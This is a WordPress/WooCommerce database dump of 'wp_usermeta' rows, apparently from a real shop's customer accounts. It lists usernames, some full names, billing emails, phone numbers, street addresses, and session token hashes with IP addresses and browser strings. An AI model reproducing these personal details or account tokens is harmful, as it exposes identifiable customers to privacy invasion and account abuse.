INSERT INTO `wp_usermeta` VALUES (10596, 654, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10597, 654, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10598, 654, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10599, 654, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10600, 654, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10601, 654, '_yoast_wpseo_profile_updated', '1492032864'); 
INSERT INTO `wp_usermeta` VALUES (10602, 654, 'session_tokens', 'a:1:{s:64:"6ca69c01a051667538904cac903a11a56a79a6e453fb3d2fdd6e2b1dc0cf0bb5";a:4:{s:10:"expiration";i:1493242473;s:2:"ip";s:13:"67.50.232.154";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492032873;}}'); 
INSERT INTO `wp_usermeta` VALUES (10603, 655, 'nickname', 'sheila'); 
INSERT INTO `wp_usermeta` VALUES (10604, 655, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10605, 655, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10606, 655, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10607, 655, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10608, 655, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10609, 655, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10610, 655, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10611, 655, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10612, 655, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10613, 655, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10614, 655, '_yoast_wpseo_profile_updated', '1492087597'); 
INSERT INTO `wp_usermeta` VALUES (10615, 655, 'session_tokens', 'a:1:{s:64:"577ef514b857b540f6edc1a88eb95c3ed0ee063229d3867b4741c8b3e53cc93d";a:4:{s:10:"expiration";i:1493297205;s:2:"ip";s:14:"75.144.125.178";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1492087605;}}'); 
INSERT INTO `wp_usermeta` VALUES (10616, 656, 'nickname', 'donna.bailey'); 
INSERT INTO `wp_usermeta` VALUES (10617, 656, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10618, 656, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10619, 656, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10620, 656, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10621, 656, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10622, 656, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10623, 656, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10624, 656, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10625, 656, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10626, 656, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10627, 656, '_yoast_wpseo_profile_updated', '1492089009'); 
INSERT INTO `wp_usermeta` VALUES (10629, 657, 'nickname', 'david.fox'); 
INSERT INTO `wp_usermeta` VALUES (10630, 657, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10631, 657, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10632, 657, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10633, 657, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10634, 657, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10635, 657, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10636, 657, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10637, 657, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10638, 657, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10639, 657, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10640, 657, '_yoast_wpseo_profile_updated', '1492091140'); 
INSERT INTO `wp_usermeta` VALUES (10641, 657, 'session_tokens', 'a:1:{s:64:"e138bd06c2fa3b7ff2685b53c48d8f7e55c7b2574f5d3d4925d1967ec5aa7fc8";a:4:{s:10:"expiration";i:1493300748;s:2:"ip";s:14:"192.107.246.16";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1492091148;}}'); 
INSERT INTO `wp_usermeta` VALUES (10642, 658, 'nickname', 'sales2'); 
INSERT INTO `wp_usermeta` VALUES (10643, 658, 'first_name', 'Debra'); 
INSERT INTO `wp_usermeta` VALUES (10644, 658, 'last_name', 'Sicard'); 
INSERT INTO `wp_usermeta` VALUES (10645, 658, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10646, 658, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10647, 658, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10648, 658, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10649, 658, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10650, 658, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10651, 658, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10652, 658, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10653, 658, '_yoast_wpseo_profile_updated', '1492094914'); 
INSERT INTO `wp_usermeta` VALUES (10655, 658, 'session_tokens', 'a:1:{s:64:"7aa32ae7f5c6d400704605742d762b63fd318e8a5a69a89892c31654ad0ccd44";a:4:{s:10:"expiration";i:1498923874;s:2:"ip";s:11:"24.91.2.240";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1498751074;}}'); 
INSERT INTO `wp_usermeta` VALUES (10656, 658, 'last_update', '1492095155'); 
INSERT INTO `wp_usermeta` VALUES (10657, 658, 'billing_first_name', 'Debra'); 
INSERT INTO `wp_usermeta` VALUES (10658, 658, 'billing_last_name', 'Sicard'); 
INSERT INTO `wp_usermeta` VALUES (10659, 658, 'billing_company', 'Ladd Research'); 
INSERT INTO `wp_usermeta` VALUES (10660, 658, 'billing_email', 'sales@laddresearch.com'); 
INSERT INTO `wp_usermeta` VALUES (10661, 658, 'billing_phone', '802-658-4961'); 
INSERT INTO `wp_usermeta` VALUES (10662, 658, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (10663, 658, 'billing_address_1', '83 Holly Court'); 
INSERT INTO `wp_usermeta` VALUES (10664, 658, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (10665, 658, 'billing_city', 'Williston'); 
INSERT INTO `wp_usermeta` VALUES (10666, 658, 'billing_state', 'VT'); 
INSERT INTO `wp_usermeta` VALUES (10667, 658, 'billing_postcode', '05495'); 
INSERT INTO `wp_usermeta` VALUES (10670, 659, 'nickname', 'jim.pena'); 
INSERT INTO `wp_usermeta` VALUES (10671, 659, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10672, 659, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10673, 659, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10674, 659, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10675, 659, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10676, 659, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10677, 659, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10678, 659, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10679, 659, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10680, 659, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10681, 659, '_yoast_wpseo_profile_updated', '1492100350'); 
INSERT INTO `wp_usermeta` VALUES (10682, 659, 'session_tokens', 'a:1:{s:64:"2e11a3d7151880ac51fab1a2945cb149f07d5fb6eb81521d8ce0c77adb2cc413";a:4:{s:10:"expiration";i:1493309958;s:2:"ip";s:13:"192.146.1.175";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492100358;}}'); 
INSERT INTO `wp_usermeta` VALUES (10683, 660, 'nickname', 'leonard'); 
INSERT INTO `wp_usermeta` VALUES (10684, 660, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10685, 660, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10686, 660, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10687, 660, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10688, 660, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10689, 660, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10690, 660, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10691, 660, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10692, 660, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10693, 660, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10694, 660, '_yoast_wpseo_profile_updated', '1492106607'); 
INSERT INTO `wp_usermeta` VALUES (10695, 660, 'session_tokens', 'a:1:{s:64:"e25725cccc58bc941a3c38e275abe3f15092b3eef1814a9cde3b71755ee4cfc0";a:4:{s:10:"expiration";i:1493316216;s:2:"ip";s:14:"207.54.114.161";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1492106616;}}'); 
INSERT INTO `wp_usermeta` VALUES (10696, 661, 'nickname', 'RMORRIS'); 
INSERT INTO `wp_usermeta` VALUES (10697, 661, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10698, 661, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10699, 661, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10700, 661, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10701, 661, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10702, 661, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10703, 661, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10704, 661, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10705, 661, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10706, 661, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10707, 661, '_yoast_wpseo_profile_updated', '1492110307'); 
INSERT INTO `wp_usermeta` VALUES (10708, 661, 'session_tokens', 'a:1:{s:64:"cfa66b9a874a38f92525572f79769b88df188bb39f6e478dd6d4df565b6c6393";a:4:{s:10:"expiration";i:1493319915;s:2:"ip";s:14:"173.64.237.162";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1492110315;}}'); 
INSERT INTO `wp_usermeta` VALUES (10709, 662, 'nickname', 'dale.beaner'); 
INSERT INTO `wp_usermeta` VALUES (10710, 662, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10711, 662, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10712, 662, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10713, 662, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10714, 662, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10715, 662, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10716, 662, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10717, 662, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10718, 662, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10719, 662, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10720, 662, '_yoast_wpseo_profile_updated', '1492114192'); 
INSERT INTO `wp_usermeta` VALUES (10721, 662, 'session_tokens', 'a:1:{s:64:"12f83aa09d77d1efb8754fddebc80ef5614615e67e878af00ea5a700f25b622f";a:4:{s:10:"expiration";i:1493323802;s:2:"ip";s:14:"209.181.88.182";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1492114202;}}'); 
INSERT INTO `wp_usermeta` VALUES (10722, 663, 'nickname', 'jntillo'); 
INSERT INTO `wp_usermeta` VALUES (10723, 663, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10724, 663, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10725, 663, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10726, 663, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10727, 663, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10728, 663, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10729, 663, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10730, 663, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10731, 663, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10732, 663, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10733, 663, '_yoast_wpseo_profile_updated', '1492121675'); 
INSERT INTO `wp_usermeta` VALUES (10734, 663, 'session_tokens', 'a:1:{s:64:"cbfe5e522a9da1d9dec38da658759334daf782dc981818938a66ee8dfcaa928d";a:4:{s:10:"expiration";i:1493331291;s:2:"ip";s:15:"198.102.155.100";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1492121691;}}'); 
INSERT INTO `wp_usermeta` VALUES (10735, 664, 'nickname', 'info4'); 
INSERT INTO `wp_usermeta` VALUES (10736, 664, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10737, 664, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10738, 664, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10739, 664, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10740, 664, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10741, 664, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10742, 664, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10743, 664, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10744, 664, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10745, 664, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10746, 664, '_yoast_wpseo_profile_updated', '1492184270'); 
INSERT INTO `wp_usermeta` VALUES (10747, 664, 'session_tokens', 'a:1:{s:64:"f0f183b23681c6b447e69a222346d2d4478301082e94633183d7c59b9f670bca";a:4:{s:10:"expiration";i:1493393880;s:2:"ip";s:11:"96.230.6.53";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492184280;}}'); 
INSERT INTO `wp_usermeta` VALUES (10748, 665, 'nickname', 'vijay'); 
INSERT INTO `wp_usermeta` VALUES (10749, 665, 'first_name', 'Vijay'); 
INSERT INTO `wp_usermeta` VALUES (10750, 665, 'last_name', 'Kumar'); 
INSERT INTO `wp_usermeta` VALUES (10751, 665, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10752, 665, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10753, 665, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10754, 665, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10755, 665, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10756, 665, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10757, 665, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10758, 665, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10759, 665, '_yoast_wpseo_profile_updated', '1492236837'); 
INSERT INTO `wp_usermeta` VALUES (10760, 665, 'session_tokens', 'a:1:{s:64:"fabaabdbcf4a14d3844093f07bbbb60b094949a71826e65afce2e03a019ee1df";a:4:{s:10:"expiration";i:1493446446;s:2:"ip";s:14:"182.68.105.101";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492236846;}}'); 
INSERT INTO `wp_usermeta` VALUES (10761, 665, 'billing_first_name', 'Vijay'); 
INSERT INTO `wp_usermeta` VALUES (10762, 665, 'billing_last_name', 'Kumar'); 
INSERT INTO `wp_usermeta` VALUES (10763, 665, 'billing_company', 'Aviation Overseas Supply Logistics (P) Ltd'); 
INSERT INTO `wp_usermeta` VALUES (10764, 665, 'billing_email', 'vijay@aviationoverseassupply.us'); 
INSERT INTO `wp_usermeta` VALUES (10765, 665, 'billing_phone', '01149126781'); 
INSERT INTO `wp_usermeta` VALUES (10766, 665, 'billing_country', 'IN'); 
INSERT INTO `wp_usermeta` VALUES (10767, 665, 'billing_address_1', 'Masterji Building, PLot no. L-6,'); 
INSERT INTO `wp_usermeta` VALUES (10768, 665, 'billing_address_2', 'House No. L-3, Street no.1'); 
INSERT INTO `wp_usermeta` VALUES (10769, 665, 'billing_city', 'Mahipalpur'); 
INSERT INTO `wp_usermeta` VALUES (10770, 665, 'billing_state', 'DL'); 
INSERT INTO `wp_usermeta` VALUES (10771, 665, 'billing_postcode', '110037'); 
INSERT INTO `wp_usermeta` VALUES (10772, 665, 'last_update', '1492236928'); 
INSERT INTO `wp_usermeta` VALUES (10773, 666, 'nickname', 'mona.emrich'); 
INSERT INTO `wp_usermeta` VALUES (10774, 666, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10775, 666, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10776, 666, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10777, 666, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10778, 666, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10779, 666, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10780, 666, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10781, 666, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10782, 666, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10783, 666, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10784, 666, '_yoast_wpseo_profile_updated', '1492437890'); 
INSERT INTO `wp_usermeta` VALUES (10785, 666, 'session_tokens', 'a:1:{s:64:"f44d80134a7a4fb39517a4278c3d1ce04831d69d04314eb690e450e78274ac9c";a:4:{s:10:"expiration";i:1493647505;s:2:"ip";s:14:"165.225.36.115";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492437905;}}'); 
INSERT INTO `wp_usermeta` VALUES (10787, 667, 'nickname', 'drastelli'); 
INSERT INTO `wp_usermeta` VALUES (10788, 667, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10789, 667, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10790, 667, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10791, 667, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10792, 667, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10793, 667, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10794, 667, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10795, 667, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10796, 667, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10797, 667, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10798, 667, '_yoast_wpseo_profile_updated', '1492450451'); 
INSERT INTO `wp_usermeta` VALUES (10799, 667, 'session_tokens', 'a:1:{s:64:"6b63f36c82101a9ba29c55c5f20a2872c21e547cc5bb39ad8b097b54ae98434e";a:4:{s:10:"expiration";i:1493660058;s:2:"ip";s:15:"209.195.180.226";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1492450458;}}'); 
INSERT INTO `wp_usermeta` VALUES (10802, 668, 'nickname', 'jordanbobo34'); 
INSERT INTO `wp_usermeta` VALUES (10803, 668, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10804, 668, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10805, 668, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10806, 668, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10807, 668, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10808, 668, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10809, 668, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10810, 668, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10811, 668, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10812, 668, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10813, 668, '_yoast_wpseo_profile_updated', '1492516526'); 
INSERT INTO `wp_usermeta` VALUES (10815, 394, 'session_tokens', 'a:1:{s:64:"b4c3f613b51460a97ad6d103b8edda338ca1826f216d03a29a641f80265200c0";a:4:{s:10:"expiration";i:1500217849;s:2:"ip";s:11:"4.34.29.178";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500045049;}}'); 
INSERT INTO `wp_usermeta` VALUES (10816, 669, 'nickname', 'tom.stross'); 
INSERT INTO `wp_usermeta` VALUES (10817, 669, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10818, 669, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10819, 669, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10820, 669, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10821, 669, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10822, 669, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10823, 669, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10824, 669, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10825, 669, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10826, 669, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10827, 669, '_yoast_wpseo_profile_updated', '1492529408'); 
INSERT INTO `wp_usermeta` VALUES (10828, 669, 'session_tokens', 'a:1:{s:64:"c438a82dd81c540ab38bf3e29cc1d8d8d54b70131689640b3ad0cf962aa3e8e6";a:4:{s:10:"expiration";i:1493739017;s:2:"ip";s:12:"66.161.233.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1492529417;}}'); 
INSERT INTO `wp_usermeta` VALUES (10829, 670, 'nickname', 'zach.richmond'); 
INSERT INTO `wp_usermeta` VALUES (10830, 670, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10831, 670, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10832, 670, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10833, 670, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10834, 670, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10835, 670, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10836, 670, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10837, 670, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10838, 670, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10839, 670, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10840, 670, '_yoast_wpseo_profile_updated', '1492537157'); 
INSERT INTO `wp_usermeta` VALUES (10841, 670, 'session_tokens', 'a:1:{s:64:"5521ca93f4d19dc9f6ca184e3f5b42ea935368f59bccd219c1a1a7af85fc5e9d";a:4:{s:10:"expiration";i:1493746766;s:2:"ip";s:13:"144.250.30.76";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1492537166;}}'); 
INSERT INTO `wp_usermeta` VALUES (10842, 671, 'nickname', 'tima'); 
INSERT INTO `wp_usermeta` VALUES (10843, 671, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10844, 671, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10845, 671, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10846, 671, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10847, 671, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10848, 671, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10849, 671, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10850, 671, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10851, 671, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10852, 671, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10853, 671, '_yoast_wpseo_profile_updated', '1492544540'); 
INSERT INTO `wp_usermeta` VALUES (10854, 671, 'session_tokens', 'a:1:{s:64:"f1b5bfdd6a3afda8684675e0af7e509c55bfc408c323cec70ead8908ecf6aa69";a:4:{s:10:"expiration";i:1493754149;s:2:"ip";s:14:"63.158.122.251";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36";s:5:"login";i:1492544549;}}'); 
INSERT INTO `wp_usermeta` VALUES (10855, 672, 'nickname', 'will-barron'); 
INSERT INTO `wp_usermeta` VALUES (10856, 672, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10857, 672, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10858, 672, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10859, 672, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10860, 672, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10861, 672, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10862, 672, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10863, 672, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10864, 672, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10865, 672, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10866, 672, '_yoast_wpseo_profile_updated', '1492547813'); 
INSERT INTO `wp_usermeta` VALUES (10867, 672, 'session_tokens', 'a:1:{s:64:"a61aefc75d409c5f738f9d2b8791b0f45bfd4495d75b045eefee95b040f75811";a:4:{s:10:"expiration";i:1493757421;s:2:"ip";s:13:"50.84.151.122";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492547821;}}'); 
